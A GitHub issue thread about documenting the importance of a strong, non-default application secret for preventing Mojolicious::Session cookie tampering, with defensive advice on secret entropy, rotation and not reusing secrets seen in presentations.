Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Mention the importance of the application secret to stop Mojolicious::Session cookie tampering #28

Open
richardleach opened this issue Nov 24, 2018 · 2 comments
Open

Mention the importance of the application secret to stop Mojolicious::Session cookie tampering #28

richardleach opened this issue Nov 24, 2018 · 2 comments

Comments

@richardleach
Copy link

Hi, I enjoyed your LPW talk today.

The question of tampering with the cookie in apps using Mojolicious::Session came up today; Sessions.md also mentioned possible tampering in the browser.

This is covered well in Day 16: The Secret Life of Sessions but key takeaways are:

  • Mojolicious::Session incorporates the application secret into the cookie signature to prevent tampering.
  • The user can take the contents of a cookie and the signature to try to guess - offline, so the server doesn't see anything - the contents of the secret.
  • So it's really important that the secret is changed from the default - which is just the application name IIRC - to something hard to guess (random, has high entropy - the post above suggest 12 chars but I'd go with 17 or more).
  • Brute-force discovery of a strong secret is impractical. (Trying all permutations is computationally infeasible.) But there's always the teeny, tiny chance that an attacker could get lucky with their guessing, so periodic rotation of the secret is a good practice.

As a side note, Mojolicious::Session uses the HMAC-SHA1 algorithm, which isn't as strong as something like HMAC-SHA256, but should still be fine for use. Use of raw SHA-1 for signatures is definitely not safe any more, but no practical attacks against HMAC-SHA1 have been made public.

Would you like a PR for sessions.md that briefly covers the above?
@duffee
Copy link
Owner

duffee commented Nov 26, 2018

Hi Richard,

Thanks for your comments. Quick reply. You raise some deeper issues that I need to address.

I've written a little on the default secret in Sessions.md,
but since version 7 came out this year (and 8 was released in September) the default secret is generated randomly in your app.conf file which covers point 3.

I'll work up my notes this aft and happily take a PR after 5pm GMT (in about 3 hours)

@richardleach
Copy link
Author

Aha, thanks for letting me know about the default secret. This only happens if you do something like "mojo generate app <appname>" though. I often create single-file throwaway Mojolicious::Lite apps and for these the default secret is still the app moniker. This might catch some people out, so still worth mentioning.

Also, you'd think it'd be obvious, but it's also worth reminding people not to re-use good secrets that they saw in a presentation. I've seen lots of cases on Github (not Perl projects) where people have done this. So much so that at my old company, we compiled a list of presentation secrets and used them when trying to crack JWT secrets!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@duffee @richardleach